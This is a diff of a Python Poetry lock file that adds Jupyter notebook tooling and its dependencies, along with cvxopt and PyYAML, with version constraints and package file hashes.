+[[package]]
+name = "anyio"
+version = "3.3.0"
+description = "High level compatibility layer for multiple asynchronous event loop implementations"
+category = "dev"
+optional = false
+python-versions = ">=3.6.2"
+
+[package.dependencies]
+idna = ">=2.8"
+sniffio = ">=1.1"
+
+[package.extras]
+doc = ["sphinx-rtd-theme", "sphinx-autodoc-typehints (>=1.2.0)"]
+test = ["coverage[toml] (>=4.5)", "hypothesis (>=4.0)", "pytest (>=6.0)", "pytest-mock (>=3.6.1)", "trustme", "uvloop (<0.15)", "mock (>=4)", "uvloop (>=0.15)"]
+trio = ["trio (>=0.16)"]
+
[[package]]
name = "appdirs"
version = "1.4.4"
@@ -6,6 +23,31 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "appnope"
+version = "0.1.2"
+description = "Disable App Nap on macOS >= 10.9"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "argon2-cffi"
+version = "20.1.0"
+description = "The secure Argon2 password hashing algorithm."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+cffi = ">=1.0.0"
+six = "*"
+
+[package.extras]
+dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pytest", "sphinx", "wheel", "pre-commit"]
+docs = ["sphinx"]
+tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pytest"]
+
[[package]]
name = "astroid"
version = "2.6.6"
@@ -18,6 +60,14 @@ python-versions = "~=3.6"
lazy-object-proxy = ">=1.4.0"
wrapt = ">=1.11,<1.13"
+[[package]]
+name = "async-generator"
+version = "1.10"
+description = "Async generators and context managers for Python 3.5+"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
[[package]]
name = "atomicwrites"
version = "1.4.0"
@@ -40,6 +90,25 @@ docs = ["furo", "sphinx", "zope.interface", "sphinx-notfound-page"]
tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface"]
tests_no_zope = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins"]
+[[package]]
+name = "babel"
+version = "2.9.1"
+description = "Internationalization utilities"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[package.dependencies]
+pytz = ">=2015.7"
+
+[[package]]
+name = "backcall"
+version = "0.2.0"
+description = "Specifications for callback functions passed in to an API"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "black"
version = "21.7b0"
@@ -62,6 +131,49 @@ d = ["aiohttp (>=3.6.0)", "aiohttp-cors (>=0.4.0)"]
python2 = ["typed-ast (>=1.4.2)"]
uvloop = ["uvloop (>=0.15.2)"]
+[[package]]
+name = "bleach"
+version = "4.0.0"
+description = "An easy safelist-based HTML-sanitizing tool."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+packaging = "*"
+six = ">=1.9.0"
+webencodings = "*"
+
+[[package]]
+name = "certifi"
+version = "2021.5.30"
+description = "Python package for providing Mozilla's CA Bundle."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "cffi"
+version = "1.14.6"
+description = "Foreign Function Interface for Python calling C code."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+pycparser = "*"
+
+[[package]]
+name = "charset-normalizer"
+version = "2.0.4"
+description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
+category = "dev"
+optional = false
+python-versions = ">=3.5.0"
+
+[package.extras]
+unicode_backport = ["unicodedata2"]
+
[[package]]
name = "click"
version = "8.0.1"
@@ -81,6 +193,114 @@ category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
+[[package]]
+name = "cvxopt"
+version = "1.2.6"
+description = "Convex optimization package"
+category = "main"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "debugpy"
+version = "1.4.1"
+description = "An implementation of the Debug Adapter Protocol for Python"
+category = "dev"
+optional = false
+python-versions = ">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*"
+
+[[package]]
+name = "decorator"
+version = "5.0.9"
+description = "Decorators for Humans"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "defusedxml"
+version = "0.7.1"
+description = "XML bomb protection for Python stdlib modules"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
+
+[[package]]
+name = "entrypoints"
+version = "0.3"
+description = "Discover and load entry points from installed packages."
+category = "dev"
+optional = false
+python-versions = ">=2.7"
+
+[[package]]
+name = "idna"
+version = "3.2"
+description = "Internationalized Domain Names in Applications (IDNA)"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "ipykernel"
+version = "6.1.0"
+description = "IPython Kernel for Jupyter"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+appnope = {version = "*", markers = "platform_system == \"Darwin\""}
+debugpy = ">=1.0.0,<2.0"
+ipython = ">=7.23.1,<8.0"
+jupyter-client = "<7.0"
+matplotlib-inline = ">=0.1.0,<0.2.0"
+tornado = ">=4.2,<7.0"
+traitlets = ">=4.1.0,<6.0"
+
+[package.extras]
+test = ["pytest (!=5.3.4)", "pytest-cov", "flaky", "nose", "ipyparallel"]
+
+[[package]]
+name = "ipython"
+version = "7.26.0"
+description = "IPython: Productive Interactive Computing"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+appnope = {version = "*", markers = "sys_platform == \"darwin\""}
+backcall = "*"
+colorama = {version = "*", markers = "sys_platform == \"win32\""}
+decorator = "*"
+jedi = ">=0.16"
+matplotlib-inline = "*"
+pexpect = {version = ">4.3", markers = "sys_platform != \"win32\""}
+pickleshare = "*"
+prompt-toolkit = ">=2.0.0,<3.0.0 || >3.0.0,<3.0.1 || >3.0.1,<3.1.0"
+pygments = "*"
+traitlets = ">=4.2"
+
+[package.extras]
+all = ["Sphinx (>=1.3)", "ipykernel", "ipyparallel", "ipywidgets", "nbconvert", "nbformat", "nose (>=0.10.1)", "notebook", "numpy (>=1.17)", "pygments", "qtconsole", "requests", "testpath"]
+doc = ["Sphinx (>=1.3)"]
+kernel = ["ipykernel"]
+nbconvert = ["nbconvert"]
+nbformat = ["nbformat"]
+notebook = ["notebook", "ipywidgets"]
+parallel = ["ipyparallel"]
+qtconsole = ["qtconsole"]
+test = ["nose (>=0.10.1)", "requests", "testpath", "pygments", "nbformat", "ipykernel", "numpy (>=1.17)"]
+
+[[package]]
+name = "ipython-genutils"
+version = "0.2.0"
+description = "Vestigial utilities from IPython"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "isort"
version = "5.9.3"
@@ -95,6 +315,178 @@ requirements_deprecated_finder = ["pipreqs", "pip-api"]
colors = ["colorama (>=0.4.3,<0.5.0)"]
plugins = ["setuptools"]
+[[package]]
+name = "jedi"
+version = "0.18.0"
+description = "An autocompletion tool for Python that can be used for text editors."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+parso = ">=0.8.0,<0.9.0"
+
+[package.extras]
+qa = ["flake8 (==3.8.3)", "mypy (==0.782)"]
+testing = ["Django (<3.1)", "colorama", "docopt", "pytest (<6.0.0)"]
+
+[[package]]
+name = "jinja2"
+version = "3.0.1"
+description = "A very fast and expressive template engine."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+MarkupSafe = ">=2.0"
+
+[package.extras]
+i18n = ["Babel (>=2.7)"]
+
+[[package]]
+name = "json5"
+version = "0.9.6"
+description = "A Python implementation of the JSON5 data format."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.extras]
+dev = ["hypothesis"]
+
+[[package]]
+name = "jsonschema"
+version = "3.2.0"
+description = "An implementation of JSON Schema validation for Python"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+attrs = ">=17.4.0"
+pyrsistent = ">=0.14.0"
+six = ">=1.11.0"
+
+[package.extras]
+format = ["idna", "jsonpointer (>1.13)", "rfc3987", "strict-rfc3339", "webcolors"]
+format_nongpl = ["idna", "jsonpointer (>1.13)", "webcolors", "rfc3986-validator (>0.1.0)", "rfc3339-validator"]
+
+[[package]]
+name = "jupyter-client"
+version = "6.2.0"
+description = "Jupyter protocol implementation and client libraries"
+category = "dev"
+optional = false
+python-versions = ">=3.6.1"
+
+[package.dependencies]
+jupyter-core = ">=4.6.0"
+nest-asyncio = ">=1.5"
+python-dateutil = ">=2.1"
+pyzmq = ">=13"
+tornado = ">=4.1"
+traitlets = "*"
+
+[package.extras]
+doc = ["sphinx (>=1.3.6)", "sphinx-rtd-theme", "sphinxcontrib-github-alt"]
+test = ["async-generator", "ipykernel", "ipython", "mock", "pytest-asyncio", "pytest-timeout", "pytest", "mypy", "pre-commit", "jedi (<0.18)"]
+
+[[package]]
+name = "jupyter-core"
+version = "4.7.1"
+description = "Jupyter core package. A base package on which Jupyter projects rely."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+pywin32 = {version = ">=1.0", markers = "sys_platform == \"win32\""}
+traitlets = "*"
+
+[[package]]
+name = "jupyter-server"
+version = "1.10.2"
+description = "The backend—i.e. core services, APIs, and REST endpoints—to Jupyter web applications."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+anyio = ">=3.1.0,<4"
+argon2-cffi = "*"
+ipython-genutils = "*"
+jinja2 = "*"
+jupyter-client = ">=6.1.1"
+jupyter-core = ">=4.6.0"
+nbconvert = "*"
+nbformat = "*"
+prometheus-client = "*"
+pyzmq = ">=17"
+requests-unixsocket = "*"
+Send2Trash = "*"
+terminado = ">=0.8.3"
+tornado = ">=6.1.0"
+traitlets = ">=4.2.1"
+websocket-client = "*"
+
+[package.extras]
+test = ["coverage", "pytest (>=6.0)", "pytest-cov", "pytest-mock", "requests", "pytest-tornasync", "pytest-console-scripts", "ipykernel"]
+
+[[package]]
+name = "jupyterlab"
+version = "3.1.6"
+description = "JupyterLab computational environment"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+ipython = "*"
+jinja2 = ">=2.1"
+jupyter-core = "*"
+jupyter-server = ">=1.4,<2.0"
+jupyterlab-server = ">=2.3,<3.0"
+nbclassic = ">=0.2,<1.0"
+packaging = "*"
+tornado = ">=6.1.0"
+
+[package.extras]
+test = ["coverage", "pytest (>=6.0)", "pytest-cov", "pytest-console-scripts", "pytest-check-links (>=0.5)", "jupyterlab-server[test] (>=2.2,<3.0)", "requests", "requests-cache", "virtualenv", "check-manifest"]
+ui-tests = ["build"]
+
+[[package]]
+name = "jupyterlab-pygments"
+version = "0.1.2"
+description = "Pygments theme using JupyterLab CSS variables"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+pygments = ">=2.4.1,<3"
+
+[[package]]
+name = "jupyterlab-server"
+version = "2.7.0"
+description = "A set of server components for JupyterLab and JupyterLab like applications ."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+babel = "*"
+entrypoints = ">=0.2.2"
+jinja2 = ">=2.10"
+json5 = "*"
+jsonschema = ">=3.0.1"
+jupyter-server = ">=1.4,<2.0"
+packaging = "*"
+requests = "*"
+
+[package.extras]
+test = ["codecov", "ipykernel", "pytest (>=5.3.2)", "pytest-cov", "jupyter-server", "openapi-core (>=0.13.8,<0.14.0)", "pytest-console-scripts", "strict-rfc3339", "ruamel.yaml", "wheel"]
+
[[package]]
name = "lazy-object-proxy"
version = "1.6.0"
@@ -103,6 +495,25 @@ category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
+[[package]]
+name = "markupsafe"
+version = "2.0.1"
+description = "Safely add untrusted strings to HTML/XML markup."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[[package]]
+name = "matplotlib-inline"
+version = "0.1.2"
+description = "Inline Matplotlib backend for Jupyter"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[package.dependencies]
+traitlets = "*"
+
[[package]]
name = "mccabe"
version = "0.6.1"
@@ -111,6 +522,14 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "mistune"
+version = "0.8.4"
+description = "The fastest markdown parser in pure Python"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "more-itertools"
version = "8.8.0"
@@ -144,6 +563,126 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "nbclassic"
+version = "0.3.1"
+description = "Jupyter Notebook as a Jupyter Server Extension."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+jupyter-server = ">=1.8,<2.0"
+notebook = "<7"
+
+[package.extras]
+test = ["pytest", "pytest-tornasync", "pytest-console-scripts"]
+
+[[package]]
+name = "nbclient"
+version = "0.5.3"
+description = "A client library for executing notebooks. Formerly nbconvert's ExecutePreprocessor."
+category = "dev"
+optional = false
+python-versions = ">=3.6.1"
+
+[package.dependencies]
+async-generator = "*"
+jupyter-client = ">=6.1.5"
+nbformat = ">=5.0"
+nest-asyncio = "*"
+traitlets = ">=4.2"
+
+[package.extras]
+dev = ["codecov", "coverage", "ipython", "ipykernel", "ipywidgets", "pytest (>=4.1)", "pytest-cov (>=2.6.1)", "check-manifest", "flake8", "mypy", "tox", "bumpversion", "xmltodict", "pip (>=18.1)", "wheel (>=0.31.0)", "setuptools (>=38.6.0)", "twine (>=1.11.0)", "black"]
+sphinx = ["Sphinx (>=1.7)", "sphinx-book-theme", "mock", "moto", "myst-parser"]
+test = ["codecov", "coverage", "ipython", "ipykernel", "ipywidgets", "pytest (>=4.1)", "pytest-cov (>=2.6.1)", "check-manifest", "flake8", "mypy", "tox", "bumpversion", "xmltodict", "pip (>=18.1)", "wheel (>=0.31.0)", "setuptools (>=38.6.0)", "twine (>=1.11.0)", "black"]
+
+[[package]]
+name = "nbconvert"
+version = "6.1.0"
+description = "Converting Jupyter Notebooks"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+bleach = "*"
+defusedxml = "*"
+entrypoints = ">=0.2.2"
+jinja2 = ">=2.4"
+jupyter-core = "*"
+jupyterlab-pygments = "*"
+mistune = ">=0.8.1,<2"
+nbclient = ">=0.5.0,<0.6.0"
+nbformat = ">=4.4"
+pandocfilters = ">=1.4.1"
+pygments = ">=2.4.1"
+testpath = "*"
+traitlets = ">=5.0"
+
+[package.extras]
+all = ["pytest", "pytest-cov", "pytest-dependency", "ipykernel", "ipywidgets (>=7)", "pyppeteer (==0.2.2)", "tornado (>=4.0)", "sphinx (>=1.5.1)", "sphinx-rtd-theme", "nbsphinx (>=0.2.12)", "ipython"]
+docs = ["sphinx (>=1.5.1)", "sphinx-rtd-theme", "nbsphinx (>=0.2.12)", "ipython"]
+serve = ["tornado (>=4.0)"]
+test = ["pytest", "pytest-cov", "pytest-dependency", "ipykernel", "ipywidgets (>=7)", "pyppeteer (==0.2.2)"]
+webpdf = ["pyppeteer (==0.2.2)"]
+
+[[package]]
+name = "nbformat"
+version = "5.1.3"
+description = "The Jupyter Notebook format"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[package.dependencies]
+ipython-genutils = "*"
+jsonschema = ">=2.4,<2.5.0 || >2.5.0"
+jupyter-core = "*"
+traitlets = ">=4.1"
+
+[package.extras]
+fast = ["fastjsonschema"]
+test = ["check-manifest", "fastjsonschema", "testpath", "pytest", "pytest-cov"]
+
+[[package]]
+name = "nest-asyncio"
+version = "1.5.1"
+description = "Patch asyncio to allow nested event loops"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "notebook"
+version = "6.4.3"
+description = "A web-based notebook environment for interactive computing"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+argon2-cffi = "*"
+ipykernel = "*"
+ipython-genutils = "*"
+jinja2 = "*"
+jupyter-client = ">=5.3.4"
+jupyter-core = ">=4.6.1"
+nbconvert = "*"
+nbformat = "*"
+prometheus-client = "*"
+pyzmq = ">=17"
+Send2Trash = ">=1.5.0"
+terminado = ">=0.8.3"
+tornado = ">=6.1"
+traitlets = ">=4.2.1"
+
+[package.extras]
+docs = ["sphinx", "nbsphinx", "sphinxcontrib-github-alt", "sphinx-rtd-theme", "myst-parser"]
+json-logging = ["json-logging"]
+test = ["pytest", "coverage", "requests", "nbval", "selenium", "pytest-cov", "requests-unixsocket"]
+
[[package]]
name = "packaging"
version = "21.0"
@@ -155,6 +694,26 @@ python-versions = ">=3.6"
[package.dependencies]
pyparsing = ">=2.0.2"
+[[package]]
+name = "pandocfilters"
+version = "1.4.3"
+description = "Utilities for writing pandoc filters in python"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[[package]]
+name = "parso"
+version = "0.8.2"
+description = "A Python Parser"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+qa = ["flake8 (==3.8.3)", "mypy (==0.782)"]
+testing = ["docopt", "pytest (<6.0.0)"]
+
[[package]]
name = "pathspec"
version = "0.9.0"
@@ -163,6 +722,25 @@ category = "dev"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7"
+[[package]]
+name = "pexpect"
+version = "4.8.0"
+description = "Pexpect allows easy control of interactive console applications."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+ptyprocess = ">=0.5"
+
+[[package]]
+name = "pickleshare"
+version = "0.7.5"
+description = "Tiny 'shelve'-like database with concurrency support"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "pluggy"
version = "0.13.1"
@@ -174,6 +752,36 @@ python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
[package.extras]
dev = ["pre-commit", "tox"]
+[[package]]
+name = "prometheus-client"
+version = "0.11.0"
+description = "Python client for the Prometheus monitoring system."
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[package.extras]
+twisted = ["twisted"]
+
+[[package]]
+name = "prompt-toolkit"
+version = "3.0.19"
+description = "Library for building powerful interactive command lines in Python"
+category = "dev"
+optional = false
+python-versions = ">=3.6.1"
+
+[package.dependencies]
+wcwidth = "*"
+
+[[package]]
+name = "ptyprocess"
+version = "0.7.0"
+description = "Run a subprocess in a pseudo terminal"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "py"
version = "1.10.0"
@@ -182,6 +790,22 @@ category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+[[package]]
+name = "pycparser"
+version = "2.20"
+description = "C parser in Python"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
+
+[[package]]
+name = "pygments"
+version = "2.9.0"
+description = "Pygments is a syntax highlighting package written in Python."
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
[[package]]
name = "pylint"
version = "2.9.6"
@@ -205,6 +829,14 @@ category = "dev"
optional = false
python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*"
+[[package]]
+name = "pyrsistent"
+version = "0.18.0"
+description = "Persistent/Functional/Immutable data structures"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
[[package]]
name = "pytest"
version = "5.4.3"
@@ -227,6 +859,61 @@ wcwidth = "*"
checkqa-mypy = ["mypy (==v0.761)"]
testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "requests", "xmlschema"]
+[[package]]
+name = "python-dateutil"
+version = "2.8.2"
+description = "Extensions to the standard Python datetime module"
+category = "dev"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
+
+[package.dependencies]
+six = ">=1.5"
+
+[[package]]
+name = "pytz"
+version = "2021.1"
+description = "World timezone definitions, modern and historical"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "pywin32"
+version = "301"
+description = "Python for Window Extensions"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "pywinpty"
+version = "1.1.3"
+description = "Pseudo terminal support for Windows from Python."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[[package]]
+name = "pyyaml"
+version = "5.4.1"
+description = "YAML parser and emitter for Python"
+category = "main"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
+
+[[package]]
+name = "pyzmq"
+version = "22.2.1"
+description = "Python bindings for 0MQ"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+cffi = {version = "*", markers = "implementation_name == \"pypy\""}
+py = {version = "*", markers = "implementation_name == \"pypy\""}
+
[[package]]
name = "regex"
version = "2021.8.3"
@@ -235,6 +922,92 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "requests"
+version = "2.26.0"
+description = "Python HTTP for Humans."
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
+
+[package.dependencies]
+certifi = ">=2017.4.17"
+charset-normalizer = {version = ">=2.0.0,<2.1.0", markers = "python_version >= \"3\""}
+idna = {version = ">=2.5,<4", markers = "python_version >= \"3\""}
+urllib3 = ">=1.21.1,<1.27"
+
+[package.extras]
+socks = ["PySocks (>=1.5.6,!=1.5.7)", "win-inet-pton"]
+use_chardet_on_py3 = ["chardet (>=3.0.2,<5)"]
+
+[[package]]
+name = "requests-unixsocket"
+version = "0.2.0"
+description = "Use requests to talk HTTP via a UNIX domain socket"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.dependencies]
+requests = ">=1.1"
+urllib3 = ">=1.8"
+
+[[package]]
+name = "send2trash"
+version = "1.8.0"
+description = "Send file to trash natively under Mac OS X, Windows and Linux."
+category = "dev"
+optional = false
+python-versions = "*"
+
+[package.extras]
+nativelib = ["pyobjc-framework-cocoa", "pywin32"]
+objc = ["pyobjc-framework-cocoa"]
+win32 = ["pywin32"]
+
+[[package]]
+name = "six"
+version = "1.16.0"
+description = "Python 2 and 3 compatibility utilities"
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
+
+[[package]]
+name = "sniffio"
+version = "1.2.0"
+description = "Sniff out which async library your code is running under"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+
+[[package]]
+name = "terminado"
+version = "0.11.0"
+description = "Tornado websocket backend for the Xterm.js Javascript terminal emulator library."
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+ptyprocess = {version = "*", markers = "os_name != \"nt\""}
+pywinpty = {version = ">=1.1.0", markers = "os_name == \"nt\""}
+tornado = ">=4"
+
+[package.extras]
+test = ["pytest"]
+
+[[package]]
+name = "testpath"
+version = "0.5.0"
+description = "Test utilities for code working with files and commands"
+category = "dev"
+optional = false
+python-versions = ">= 3.5"
+
+[package.extras]
+test = ["pytest", "pathlib2"]
+
[[package]]
name = "toml"
version = "0.10.2"
@@ -251,6 +1024,36 @@ category = "dev"
optional = false
python-versions = ">=3.6"
+[[package]]
+name = "tornado"
+version = "6.1"
+description = "Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed."
+category = "dev"
+optional = false
+python-versions = ">= 3.5"
+
+[[package]]
+name = "traitlets"
+version = "5.0.5"
+description = "Traitlets Python configuration system"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+
+[package.dependencies]
+ipython-genutils = "*"
+
+[package.extras]
+test = ["pytest"]
+
+[[package]]
+name = "types-pyyaml"
+version = "5.4.6"
+description = "Typing stubs for PyYAML"
+category = "dev"
+optional = false
+python-versions = "*"
+
[[package]]
name = "typing-extensions"
version = "3.10.0.0"
@@ -259,6 +1062,19 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "urllib3"
+version = "1.26.6"
+description = "HTTP library with thread-safe connection pooling, file post, and more."
+category = "dev"
+optional = false
+python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4"
+
+[package.extras]
+brotli = ["brotlipy (>=0.6.0)"]
+secure = ["pyOpenSSL (>=0.14)", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "certifi", "ipaddress"]
+socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"]
+
[[package]]
name = "wcwidth"
version = "0.2.5"
@@ -267,6 +1083,26 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "webencodings"
+version = "0.5.1"
+description = "Character encoding aliases for legacy web content"
+category = "dev"
+optional = false
+python-versions = "*"
+
+[[package]]
+name = "websocket-client"
+version = "1.2.1"
+description = "WebSocket client for Python with low level API options"
+category = "dev"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+optional = ["python-socks", "wsaccel"]
+test = ["websockets"]
+
[[package]]
name = "wrapt"
version = "1.12.1"
@@ -278,17 +1114,49 @@ python-versions = "*"
[metadata]
lock-version = "1.1"
python-versions = "^3.8"
-content-hash = "c518467267a9bf0545c2e27f15dcd22caab4a3ef236b25e979ce6d9af8958b02"
+content-hash = "a80ab2d038ebd23b2a35fddb2e703975351608f10eedf2519677c49d97feb518"
[metadata.files]
+anyio = [
+ {file = "anyio-3.3.0-py3-none-any.whl", hash = "sha256:929a6852074397afe1d989002aa96d457e3e1e5441357c60d03e7eea0e65e1b0"},
+ {file = "anyio-3.3.0.tar.gz", hash = "sha256:ae57a67583e5ff8b4af47666ff5651c3732d45fd26c929253748e796af860374"},
+]
appdirs = [
{file = "appdirs-1.4.4-py2.py3-none-any.whl", hash = "sha256:a841dacd6b99318a741b166adb07e19ee71a274450e68237b4650ca1055ab128"},
{file = "appdirs-1.4.4.tar.gz", hash = "sha256:7d5d0167b2b1ba821647616af46a749d1c653740dd0d2415100fe26e27afdf41"},
]
+appnope = [
+ {file = "appnope-0.1.2-py2.py3-none-any.whl", hash = "sha256:93aa393e9d6c54c5cd570ccadd8edad61ea0c4b9ea7a01409020c9aa019eb442"},
+ {file = "appnope-0.1.2.tar.gz", hash = "sha256:dd83cd4b5b460958838f6eb3000c660b1f9caf2a5b1de4264e941512f603258a"},
+]
+argon2-cffi = [
+ {file = "argon2-cffi-20.1.0.tar.gz", hash = "sha256:d8029b2d3e4b4cea770e9e5a0104dd8fa185c1724a0f01528ae4826a6d25f97d"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-macosx_10_6_intel.whl", hash = "sha256:6ea92c980586931a816d61e4faf6c192b4abce89aa767ff6581e6ddc985ed003"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:05a8ac07c7026542377e38389638a8a1e9b78f1cd8439cd7493b39f08dd75fbf"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-win32.whl", hash = "sha256:0bf066bc049332489bb2d75f69216416329d9dc65deee127152caeb16e5ce7d5"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-win_amd64.whl", hash = "sha256:57358570592c46c420300ec94f2ff3b32cbccd10d38bdc12dc6979c4a8484fbc"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:7d455c802727710e9dfa69b74ccaab04568386ca17b0ad36350b622cd34606fe"},
+ {file = "argon2_cffi-20.1.0-cp35-abi3-manylinux1_x86_64.whl", hash = "sha256:b160416adc0f012fb1f12588a5e6954889510f82f698e23ed4f4fa57f12a0647"},
+ {file = "argon2_cffi-20.1.0-cp35-cp35m-win32.whl", hash = "sha256:9bee3212ba4f560af397b6d7146848c32a800652301843df06b9e8f68f0f7361"},
+ {file = "argon2_cffi-20.1.0-cp35-cp35m-win_amd64.whl", hash = "sha256:392c3c2ef91d12da510cfb6f9bae52512a4552573a9e27600bdb800e05905d2b"},
+ {file = "argon2_cffi-20.1.0-cp36-cp36m-win32.whl", hash = "sha256:ba7209b608945b889457f949cc04c8e762bed4fe3fec88ae9a6b7765ae82e496"},
+ {file = "argon2_cffi-20.1.0-cp36-cp36m-win_amd64.whl", hash = "sha256:da7f0445b71db6d3a72462e04f36544b0de871289b0bc8a7cc87c0f5ec7079fa"},
+ {file = "argon2_cffi-20.1.0-cp37-abi3-macosx_10_6_intel.whl", hash = "sha256:cc0e028b209a5483b6846053d5fd7165f460a1f14774d79e632e75e7ae64b82b"},
+ {file = "argon2_cffi-20.1.0-cp37-cp37m-win32.whl", hash = "sha256:18dee20e25e4be86680b178b35ccfc5d495ebd5792cd00781548d50880fee5c5"},
+ {file = "argon2_cffi-20.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:6678bb047373f52bcff02db8afab0d2a77d83bde61cfecea7c5c62e2335cb203"},
+ {file = "argon2_cffi-20.1.0-cp38-cp38-win32.whl", hash = "sha256:77e909cc756ef81d6abb60524d259d959bab384832f0c651ed7dcb6e5ccdbb78"},
+ {file = "argon2_cffi-20.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:9dfd5197852530294ecb5795c97a823839258dfd5eb9420233c7cfedec2058f2"},
+ {file = "argon2_cffi-20.1.0-cp39-cp39-win32.whl", hash = "sha256:e2db6e85c057c16d0bd3b4d2b04f270a7467c147381e8fd73cbbe5bc719832be"},
